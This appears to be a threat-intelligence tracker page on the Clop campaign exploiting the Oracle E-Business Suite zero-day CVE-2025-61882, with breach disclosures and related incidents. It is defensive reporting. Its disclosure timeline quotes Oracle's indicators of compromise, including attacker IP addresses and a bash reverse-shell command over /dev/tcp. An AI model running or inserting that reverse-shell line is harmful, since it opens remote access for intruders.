Oracle E-Business Suite actively exploited unauthenticated RCE (CVE-2025-61882)
Vulnerability
Summary
CVE-2025-61882 is a critical zero-day in Oracle E-Business Suite that enabled unauthenticated remote code execution and was actively exploited in Clop data theft activity. The flaw affects Oracle Concurrent Processing / BI Publisher Integration and poses immediate risk to exposed systems. Oracle issued an emergency update, and the exploit material tied to the abuse also circulated publicly. Google Threat Intelligence Group (GTIG) and Mandiant assessed that the campaign likely began targeting Oracle EBS as early as August 9, 2025, with significant data exfiltration and extortion emails observed from September 29. The latest report adds that the University of Phoenix disclosed a breach affecting 3,489,274 individuals after unauthorized access to its Oracle E-Business Suite (EBS) financial application during August 13-22, 2025. The institution said the stolen information included names and contact information, dates of birth, Social Security numbers, and bank account and routing numbers. Investigators found the intrusion was not detected until November 21, and the university filed notice in early December and offered identity protection services to affected individuals. The attack is believed to be part of the broader Clop campaign exploiting CVE-2025-61882 across more than 100 organizations.
Cases
Related Happenings
Oracle WebLogic Server CVE-2026-21962 rapid exploitation wave
Exploitation Wave
First: 26.03.2026 18:00
Last: 26.03.2026 18:00
Sources 1
About this happening:
**Oracle WebLogic Server** systems faced a rapid **CVE-2026-21962** exploitation wave after public exploit code appeared, creating immediate **RCE risk** for exposed servers. The...
Madison Square Garden hit by network compromise linked to Cl0p
Incident
First: 02.03.2026 15:53
Last: 02.03.2026 15:53
Sources 1
About this happening:
**Madison Square Garden** confirmed a **data breach** that exposed **names and SSNs**, and it has started notifying affected people. The compromise involved a **hosted Oracle E-Bu...
Cl0p Oracle E-Business Suite zero-day extortion campaign
Campaign
First: 02.03.2026 15:53
Last: 02.03.2026 15:53
Sources 1
About this happening:
The **Cl0p ransomware and extortion group** is running an **Oracle E-Business Suite** extortion campaign that used **zero-day vulnerabilities** to access data from **more than 100...
SolarWinds Web Help Desk (WHD) multi-stage exploitation wave
Exploitation Wave
First: 09.02.2026 16:42
Last: 09.02.2026 16:42
Sources 1
About this happening:
**SolarWinds Web Help Desk (WHD)** exploitation is a **multi-stage intrusion wave** affecting **internet-exposed WHD instances**. The foothold remains unconfirmed, but the wave is...
Latest development: 10.03.2026 08:17
CISA added CVE-2025-26399 in SolarWinds Web Help Desk to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation, said Microsoft and Huntress had reported threat actors using SolarWinds Web Help Desk flaws to obtain initial access, attributed the activity to the Warlock ransomware crew, and ordered Federal Civilian Executive Branch (FCEB) agencies to apply the fix by March 12, 2026.
CISA KEV remediation deadline for SolarWinds WHD CVE-2025-40551
Public Sector Action
First: 04.02.2026 07:50
Last: 04.02.2026 07:50
Sources 1
About this happening:
**CISA** added **CVE-2025-40551** in **SolarWinds Web Help Desk** to the **KEV catalog** and imposed **federal remediation deadlines**, turning a newly exploited flaw into a compl...
Timeline
- 13.10.2025 14:14 · 5 articles · 7mo ago
Harvard University linked to Oracle E-Business Suite zero-day breach
Victim Impact Update: Harvard University is investigating a data breach tied to Oracle E-Business Suite CVE-2025-61882 after Clop added Harvard to its data leak site and said it would release the university’s data; Harvard said the affected activity appears limited to a small administrative unit, that it applied Oracle’s patch to remediate the vulnerability, and that it has no evidence of compromise to other University systems.
Sources:
- Harvard investigating breach linked to Oracle zero-day exploit — www.bleepingcomputer.com — 13.10.2025 14:14
- Logitech confirms data breach after Clop extortion attack — www.bleepingcomputer.com — 15.11.2025 00:18
- Dartmouth College confirms data breach after Clop extortion attack — www.bleepingcomputer.com — 25.11.2025 13:12
- Barts Health NHS discloses data breach after Oracle zero-day hack — www.bleepingcomputer.com — 05.12.2025 20:55
- Clop Ransomware Group Linked to 3.5m University of Phoenix Breach — www.infosecurity-magazine.com — 23.12.2025 18:00
- 06.10.2025 04:37 · 5 articles · 7mo ago
Oracle discloses and patches CVE-2025-61882 in Oracle E-Business Suite
Initial Disclosure: Oracle warned that CVE-2025-61882 is a critical Oracle E-Business Suite zero-day in Oracle Concurrent Processing (BI Publisher Integration) with a CVSS base score of 9.8, remotely exploitable without authentication and capable of remote code execution, affecting versions 12.2.3-12.2.14. Oracle released an emergency update and said customers may need to install the October 2023 Critical Patch Update first; the same vulnerability was tied to Clop data theft activity in August 2025, and Oracle published indicators of compromise including `200[.]107[.]207[.]26`, `185[.]181[.]60[.]11`, and `sh -c /bin/bash -i >& /dev/tcp// 0>&1` that matched the exploit archive shared on Telegram.
Sources:
- Oracle patches EBS zero-day exploited in Clop data theft attacks — www.bleepingcomputer.com — 06.10.2025 04:37
- Oracle patches EBS zero-day exploited in Clop data theft attacks — www.bleepingcomputer.com — 06.10.2025 04:37
- NCSC: Patch Critical Oracle EBS Bug Now — www.infosecurity-magazine.com — 07.10.2025 12:45
- Clop exploited Oracle zero-day for data theft since early August — www.bleepingcomputer.com — 07.10.2025 20:27
- Google: Clop Accessed “Significant Amount” of Data in Oracle EBS Exploit — www.infosecurity-magazine.com — 10.10.2025 13:15